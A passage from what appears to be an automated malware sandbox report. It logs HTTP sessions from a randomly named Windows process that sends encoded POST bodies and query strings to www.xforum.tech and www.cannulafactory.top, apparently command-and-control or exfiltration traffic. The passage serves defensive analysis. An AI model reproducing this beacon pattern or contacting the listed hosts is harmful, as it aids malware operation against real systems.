                                        Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        22 | 192.168.2.4 | 49759 | 103.224.182.242 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:58.497771025 CEST | 760 | OUT | POST /647x/ HTTP/1.1
                                        Host: www.xforum.tech
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.xforum.tech
                                        Referer: http://www.xforum.tech/647x/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 36 41 52 35 2b 7a 37 30 77 45 43 6b 58 4f 6b 77 30 43 2f 63 36 74 73 57 2b 58 34 4d 4a 4b 56 47 36 58 38 51 76 62 74 55 4e 61 47 64 47 61 76 4b 48 79 4e 72 37 65 65 38 2b 46 4e 6d 2f 63 38 56 53 69 56 74 79 58 77 56 6a 68 44 62 72 4e 7a 30 6e 30 38 59 56 77 55 47 74 4b 69 45 53 66 63 7a 5a 30 74 64 63 6d 6d 69 68 55 73 33 57 31 6e 46 41 6b 2b 33 64 41 6b 75 38 74 6e 52 47 2f 75 58 4e 73 4e 36 36 66 6e 78 71 4f 43 56 7a 66 67 71 67 62 73 49 74 61 58 30 68 4f 73 49 36 67 6a 76 62 74 39 6c 36 53 63 48 64 4f 51 55 77 61 31 53 53 67 4a 57 51 63 70 32 48 34 59 46 4b 32 4f 71 71 76 30 46 4b 6f 31 69 7a 44 59 3d
                                        Data Ascii: r8=Ily3CeU2s+qA6AR5+z70wECkXOkw0C/c6tsW+X4MJKVG6X8QvbtUNaGdGavKHyNr7ee8+FNm/c8VSiVtyXwVjhDbrNz0n08YVwUGtKiESfczZ0tdcmmihUs3W1nFAk+3dAku8tnRG/uXNsN66fnxqOCVzfgqgbsItaX0hOsI6gjvbt9l6ScHdOQUwa1SSgJWQcp2H4YFK2Oqqv0FKo1izDY=
                                        Sep 3, 2024 13:54:59.110877991 CEST | 872 | IN | HTTP/1.1 200 OK
                                        date: Tue, 03 Sep 2024 11:54:59 GMT
                                        server: Apache
                                        set-cookie: __tad=1725364499.3792583; expires=Fri, 01-Sep-2034 11:54:59 GMT; Max-Age=315360000
                                        vary: Accept-Encoding
                                        content-encoding: gzip
                                        content-length: 577
                                        content-type: text/html; charset=UTF-8
                                        connection: close
                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                                        Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        23 | 192.168.2.4 | 49760 | 103.224.182.242 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:55:01.054883957 CEST | 10842 | OUT | POST /647x/ HTTP/1.1
                                        Host: www.xforum.tech
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.xforum.tech
                                        Referer: http://www.xforum.tech/647x/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 36 41 52 35 2b 7a 37 30 77 45 43 6b 58 4f 6b 77 30 43 2f 63 36 74 73 57 2b 58 34 4d 4a 4b 74 47 36 6b 30 51 73 38 5a 55 4b 61 47 64 4f 36 76 50 48 79 4e 4d 37 61 79 34 2b 46 78 70 2f 66 45 56 54 41 64 74 30 6d 77 56 73 68 44 62 6b 74 7a 33 6a 30 38 52 56 77 45 43 74 4f 47 45 53 66 63 7a 5a 32 46 64 4b 6e 6d 69 79 45 73 77 66 56 6e 5a 45 6b 2b 66 64 45 41 2b 38 74 54 76 47 4d 6d 58 44 73 39 36 35 70 62 78 69 4f 43 54 77 66 67 79 67 62 6f 62 74 61 36 50 68 4f 5a 74 36 67 58 76 62 59 77 71 6e 78 59 46 4f 38 4a 4a 6c 64 52 5a 56 7a 56 6a 51 72 6c 63 45 59 6b 6a 58 56 75 4f 71 50 77 56 65 49 78 6f 6c 7a 6d 31 5a 34 70 49 43 6f 79 30 65 49 6f 57 68 34 62 42 77 52 31 65 53 71 59 35 70 49 53 4b 32 4d 48 52 48 4d 65 79 56 6a 67 44 4b 77 61 6c 4c 72 7a 58 6c 59 56 49 51 2f 68 6a 45 6e 6d 54 6f 56 45 79 73 72 64 79 6a 31 37 49 73 2f 64 69 6a 30 71 75 6e 42 30 6f 69 42 4d 42 51 51 44 68 50 39 73 68 57 4b 72 4a 61 6e 33 6e 58 30 49 39 32 62 45 53 65 6a 59 64 59 75 63 [TRUNCATED]
                                        Data Ascii: r8=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 [TRUNCATED]
                                        Sep 3, 2024 13:55:01.786588907 CEST | 872 | IN | HTTP/1.1 200 OK
                                        date: Tue, 03 Sep 2024 11:55:01 GMT
                                        server: Apache
                                        set-cookie: __tad=1725364501.8386285; expires=Fri, 01-Sep-2034 11:55:01 GMT; Max-Age=315360000
                                        vary: Accept-Encoding
                                        content-encoding: gzip
                                        content-length: 577
                                        content-type: text/html; charset=UTF-8
                                        connection: close
                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                                        Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        24 | 192.168.2.4 | 49761 | 103.224.182.242 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:55:03.610995054 CEST | 481 | OUT | GET /647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s= HTTP/1.1
                                        Host: www.xforum.tech
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:55:04.188083887 CEST | 1236 | IN | HTTP/1.1 200 OK
                                        date: Tue, 03 Sep 2024 11:55:04 GMT
                                        server: Apache
                                        set-cookie: __tad=1725364504.4310007; expires=Fri, 01-Sep-2034 11:55:04 GMT; Max-Age=315360000
                                        vary: Accept-Encoding
                                        content-length: 1476
                                        content-type: text/html; charset=UTF-8
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 78 66 6f 72 75 6d 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 66 6f 72 75 6d 2e 74 65 63 68 2f 36 34 37 78 2f 3f 56 5a 3d 71 7a 77 4c 55 4a 33 58 62 62 32 38 26 72 38 3d 46 6e 61 58 42 6f 78 35 34 2b 61 67 37 67 35 69 77 6d 50 36 6c 45 75 61 59 72 4e 79 39 78 66 34 33 65 52 63 68 68 4a 79 48 63 78 6a 32 6e 42 73 76 5a 5a 54 54 6f 66 42 44 75 44 72 54 52 78 44 77 4a 53 2f 78 6c 78 71 32 38 77 46 62 43 4a 37 6f 6b 55 70 68 30 50 59 70 4f 47 75 73 52 67 42 54 43 74 69 30 2b 47 71 52 66 39 4e 59 45 4a 33 4d 33 6e 49 67 33 73 3d 26 [TRUNCATED]
                                        Data Ascii: <html><head><title>xforum.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" tex
                                        Sep 3, 2024 13:55:04.188101053 CEST | 512 | IN | Data Raw: 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 66 6f 72 75 6d 2e 74 65 63 68 2f 36 34 37 78 2f 3f 56 5a 3d
                                        Data Ascii: t="#000000"><div style='display: none;'><a href='http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&fp=-3'>Click here to ent


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        25 | 192.168.2.4 | 49762 | 18.183.3.45 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:55:09.398015022 CEST | 761 | OUT | POST /l90v/ HTTP/1.1
                                        Host: www.cannulafactory.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.cannulafactory.top
                                        Referer: http://www.cannulafactory.top/l90v/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 66 54 67 75 6c 36 77 7a 79 2f 41 41 76 44 6d 76 72 69 37 37 77 6b 75 79 56 6d 4f 50 59 41 56 45 72 38 37 71 5a 4c 33 57 63 37 34 69 48 30 65 45 62 4a 4b 6e 6a 56 6b 73 58 59 67 6b 50 73 6c 6b 4c 45 6e 33 76 36 44 59 4f 52 6d 61 2f 2f 69 54 52 70 69 58 2f 32 7a 57 6d 75 35 69 61 4f 68 77 44 6e 5a 53 57 50 55 7a 72 77 57 6c 51 6a 77 70 4a 6f 64 42 30 54 6a 2f 6b 31 32 71 7a 38 41 7a 39 66 6d 76 45 46 41 2f 6e 38 67 48 32 59 6e 56 6e 33 65 61 76 55 63 67 44 35 52 6d 37 6d 4b 2b 30 64 56 34 66 58 65 39 6c 47 33 65 43 77 35 48 45 76 6a 6c 53 51 3d 3d
                                        Data Ascii: r8=37FT9IHDPOAKfTgul6wzy/AAvDmvri77wkuyVmOPYAVEr87qZL3Wc74iH0eEbJKnjVksXYgkPslkLEn3v6DYORma//iTRpiX/2zWmu5iaOhwDnZSWPUzrwWlQjwpJodB0Tj/k12qz8Az9fmvEFA/n8gH2YnVn3eavUcgD5Rm7mK+0dV4fXe9lG3eCw5HEvjlSQ==
                                        Sep 3, 2024 13:55:10.269903898 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 03 Sep 2024 11:55:10 GMT
                                        Content-Type: text/html
                                        Content-Length: 3971
                                        Connection: close
                                        ETag: "6526681e-f83"
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                        Sep 3, 2024 13:55:10.269926071 CEST | 1236 | IN
                                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                                        Sep 3, 2024 13:55:10.269941092 CEST | 448 | IN
                                        Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                                        Sep 3, 2024 13:55:10.269953012 CEST | 1224 | IN
                                        Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        26 | 192.168.2.4 | 49763 | 18.183.3.45 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:55:11.941679001 CEST | 781 | OUT | POST /l90v/ HTTP/1.1
                                        Host: www.cannulafactory.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.cannulafactory.top
                                        Referer: http://www.cannulafactory.top/l90v/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Ascii: r8=37FT9IHDPOAKew4ugYYz6/ADljmviC7nwkyyVnKfYWlEodLqLa3WZ74iPUeBUpKsjVoCXZckPoNkLAj3uJbZOBmcyfiRfJiX/2zWmudcaOpwAXJSUtsw0AWmRjwpfYdF0TjJk0rNz+oz9aavERc8s8gBpImlmkCS2lsxK4ECk0e4xbEiOm/q3GTtf3wzJsesJRBGl75vKEQsaRcSg/2nCiA=
                                        Sep 3, 2024 13:55:12.801961899 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 03 Sep 2024 11:55:12 GMT
                                        Content-Type: text/html
                                        Content-Length: 3971
                                        Connection: close
                                        ETag: "6526681e-f83"
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                        Sep 3, 2024 13:55:12.801978111 CEST | 1236 | IN
                                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                                        Sep 3, 2024 13:55:12.801990986 CEST | 1236 | IN
                                        Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                                        Sep 3, 2024 13:55:12.802005053 CEST | 436 | IN
                                        Data Ascii: a href="http://nginx.net/"><img src="nginx-logo.png" alt="[ Powered by nginx ]" width="121" height="32" /></a> <a href="http://www.redhat.com/"><img


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        27 | 192.168.2.4 | 49764 | 18.183.3.45 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:55:14.487772942 CEST | 10863 | OUT | POST /l90v/ HTTP/1.1
                                        Host: www.cannulafactory.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.cannulafactory.top
                                        Referer: http://www.cannulafactory.top/l90v/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:55:15.995841026 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 03 Sep 2024 11:55:15 GMT
                                        Content-Type: text/html
                                        Content-Length: 3971
                                        Connection: close
                                        ETag: "6526681e-f83"
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                        Sep 3, 2024 13:55:15.995855093 CEST | 224 | IN
                                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; ba
                                        Sep 3, 2024 13:55:15.995872974 CEST | 1236 | IN
                                        Data Ascii: ckground-color: #900; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #000; }
                                        Sep 3, 2024 13:55:15.995884895 CEST | 1236 | IN
                                        Data Ascii: iv class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with
                                        Sep 3, 2024 13:55:15.995893955 CEST | 212 | IN
                                        Data Ascii: g src="poweredby.png" alt="[ Powered by Red Hat Enterprise Linux ]" width="88" height="31" /></a> </div> </div> </body></html>
                                        Sep 3, 2024 13:55:15.995929956 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 03 Sep 2024 11:55:15 GMT
                                        Content-Type: text/html
                                        Content-Length: 3971
                                        Connection: close
                                        ETag: "6526681e-f83"
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                        Sep 3, 2024 13:55:15.996488094 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 03 Sep 2024 11:55:15 GMT
                                        Content-Type: text/html
                                        Content-Length: 3971
                                        Connection: close
                                        ETag: "6526681e-f83"
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        28 | 192.168.2.4 | 49765 | 18.183.3.45 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:55:17.868993998 CEST | 488 | OUT | GET /l90v/?r8=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&VZ=qzwLUJ3Xbb28 HTTP/1.1
                                        Host: www.cannulafactory.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:55:18.742942095 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 03 Sep 2024 11:55:18 GMT
                                        Content-Type: text/html
                                        Content-Length: 3971
                                        Connection: close
                                        ETag: "6526681e-f83"
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                        Sep 3, 2024 13:55:18.742969036 CEST | 1236 | IN
                                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                                        Sep 3, 2024 13:55:18.742981911 CEST | 448 | IN
